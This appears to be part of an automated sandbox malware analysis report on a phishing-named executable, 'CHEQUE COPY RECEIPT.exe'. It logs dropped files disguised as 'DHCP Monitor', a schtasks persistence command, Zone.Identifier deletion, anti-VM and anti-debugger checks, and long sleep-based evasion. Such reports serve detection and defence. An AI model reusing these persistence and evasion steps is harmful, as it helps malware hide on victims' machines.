Source: 1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior:

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	File created: C:\Users\user\AppData\Local\Temp\nsfF3F1.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	File created: C:\Users\user\AppData\Local\Temp\nscD29E.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	File created: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpE682.tmp'

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

File opened: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Window / User API: threadDelayed 5075	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Window / User API: threadDelayed 4232	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Window / User API: foregroundWindowGot 857	Jump to behavior

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe TID: 4828	Thread sleep time: -21213755684765971s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe TID: 6244	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe TID: 6224	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 0_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405A15
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 0_2_004065C1 FindFirstFileA,FindClose,	0_2_004065C1
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 1_2_00404A29 FindFirstFileExW,	1_2_00404A29
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 10_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	10_2_00405A15
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 10_2_004065C1 FindFirstFileA,FindClose,	10_2_004065C1
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 10_2_004027A1 FindFirstFileA,	10_2_004027A1
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 12_2_00404A29 FindFirstFileExW,	12_2_00404A29

Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.509100019.0000000006510000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.499581962.0000000000822000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt"V)6H
Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.509100019.0000000006510000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.509100019.0000000006510000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.509100019.0000000006510000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Code function: 1_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_0040446F

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Code function: 0_2_73CA1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_73CA1A98

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 0_2_10004564 mov eax, dword ptr fs:[00000030h]	0_2_10004564
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 0_2_10004767 mov eax, dword ptr fs:[00000030h]	0_2_10004767
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 1_2_004035F1 mov eax, dword ptr fs:[00000030h]	1_2_004035F1
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 9_2_10004564 mov eax, dword ptr fs:[00000030h]	9_2_10004564
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 9_2_10004767 mov eax, dword ptr fs:[00000030h]	9_2_10004767
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 12_2_004035F1 mov eax, dword ptr fs:[00000030h]	12_2_004035F1

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Code function: 1_2_004067FE GetProcessHeap,

1_2_004067FE

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 1_2_00401E1D SetUnhandledExceptionFilter,	1_2_00401E1D
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 1_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0040446F
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 1_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00401C88
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 1_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00401F30
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 12_2_00401E1D SetUnhandledExceptionFilter,	12_2_00401E1D
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 12_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0040446F
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 12_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00401C88
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 12_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00401F30

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Section loaded: unknown target: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Section loaded: unknown target: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe protection: execute and read and write			Jump to behavior

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process created: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe 'C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe'	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpE682.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpEA6B.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Process created: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe 'C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe' 0	Jump to behavior

Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.508603579.00000000058CD000.00000004.00000001.sdmp	Binary or memory string: Program Manager4:
Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.503747370.0000000002938000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.500015497.0000000000D70000.00000002.00000001.sdmp, dhcpmon.exe, 0000000A.00000002.499532247.0000000000D10000.00000002.00000001.sdmp, dhcpmon.exe, 0000000F.00000002.499521748.0000000000CF0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.500015497.0000000000D70000.00000002.00000001.sdmp, dhcpmon.exe, 0000000A.00000002.499532247.0000000000D10000.00000002.00000001.sdmp, dhcpmon.exe, 0000000F.00000002.499521748.0000000000CF0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.500015497.0000000000D70000.00000002.00000001.sdmp, dhcpmon.exe, 0000000A.00000002.499532247.0000000000D10000.00000002.00000001.sdmp, dhcpmon.exe, 0000000F.00000002.499521748.0000000000CF0000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.500015497.0000000000D70000.00000002.00000001.sdmp, dhcpmon.exe, 0000000A.00000002.499532247.0000000000D10000.00000002.00000001.sdmp, dhcpmon.exe, 0000000F.00000002.499521748.0000000000CF0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.500015497.0000000000D70000.00000002.00000001.sdmp, dhcpmon.exe, 0000000A.00000002.499532247.0000000000D10000.00000002.00000001.sdmp, dhcpmon.exe, 0000000F.00000002.499521748.0000000000CF0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
